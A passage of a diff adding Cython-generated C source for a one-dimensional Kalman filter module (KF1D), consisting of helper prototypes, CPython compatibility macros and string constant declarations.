RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* GetAttr3.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *, PyObject *, PyObject *); + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* RaiseUnexpectedTypeError.proto */ +static int __Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj); + +/* PySequenceContains.proto */ +static CYTHON_INLINE int __Pyx_PySequence_ContainsTF(PyObject* item, PyObject* seq, int eq) { + int result = PySequence_Contains(seq, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportFrom.proto */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* GetAttr.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *, PyObject *); + +/* HasAttr.proto */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *, PyObject *); + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ + +/* Module declarations from "common.kalman.simple_kalman_impl" */ +static PyObject *__pyx_f_6common_6kalman_18simple_kalman_impl___pyx_unpickle_KF1D__set_state(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *, PyObject *); /*proto*/ +/* #### Code section: typeinfo ### */ +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "common.kalman.simple_kalman_impl" +extern int __pyx_module_is_main_common__kalman__simple_kalman_impl; +int __pyx_module_is_main_common__kalman__simple_kalman_impl = 0; + +/* Implementation of "common.kalman.simple_kalman_impl" */ +/* #### Code section: global_var ### */ +/* #### Code section: string_decls ### */ +static const char __pyx_k_A[] = "A"; +static const char __pyx_k_C[] = "C"; +static const char __pyx_k_K[] = "K"; +static const char __pyx_k__2[] = "."; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_x0[] = "x0"; +static const char __pyx_k__11[] = "?"; +static const char __pyx_k_new[] = "__new__"; +static const char __pyx_k_KF1D[] = "KF1D"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_meas[] = "meas"; +static const char __pyx_k_name[] = "__name__"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_x0_0[] = "x0_0"; +static const char __pyx_k_x1_0[] = "x1_0"; +static const char __pyx_k_state[] = "state"; +static const char __pyx_k_dict_2[] = "_dict"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_pickle[] = "pickle"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_update[] = "update"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_pyx_type[] = "__pyx_type"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_pyx_result[] = "__pyx_result"; +static const char __pyx_k_KF1D_update[] = "KF1D.update"; +static const char __pyx_k_PickleError[] = "PickleError"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_pyx_checksum[] = "__pyx_checksum"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_use_setstate[] = "use_setstate"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_pyx_PickleError[] = "__pyx_PickleError"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_pyx_unpickle_KF1D[] = "__pyx_unpickle_KF1D"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_KF1D___reduce_cython[] = "KF1D.__reduce_cython__"; +static const char __pyx_k_KF1D___setstate_cython[] = "KF1D.__setstate_cython__"; +static const char __pyx_k_Incompatible_checksums_0x_x_vs_0[] = "Incompatible checksums (0x%x vs (0xfddd3d9, 0xdbf7d68, 0x3439d7a) = (A0_0, A0_1, A1_0, A1_1, A_K_0, A_K_1, A_K_2, A_K_3, C0_0, C0_1, K0_0, K1_0, x0_0, x1_0))"; +static const char __pyx_k_common_kalman_simple_kalman_impl[] = "common/kalman/simple_kalman_impl.pyx"; +static const char __pyx_k_common_kalman_simple_kalman_impl_2[] = "common.kalman.simple_kalman_impl"; +/* #### Code section: decls ### */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D___init__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_x0, PyObject *__pyx_v_A, PyObject *__pyx_v_C, PyObject *__pyx_v_K); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_2update(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_meas); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_1x___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_1x_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_x); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4x1_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4K1_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_0_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self); /* proto */ +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_4A0_1_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_value); /* proto */ +static PyObject 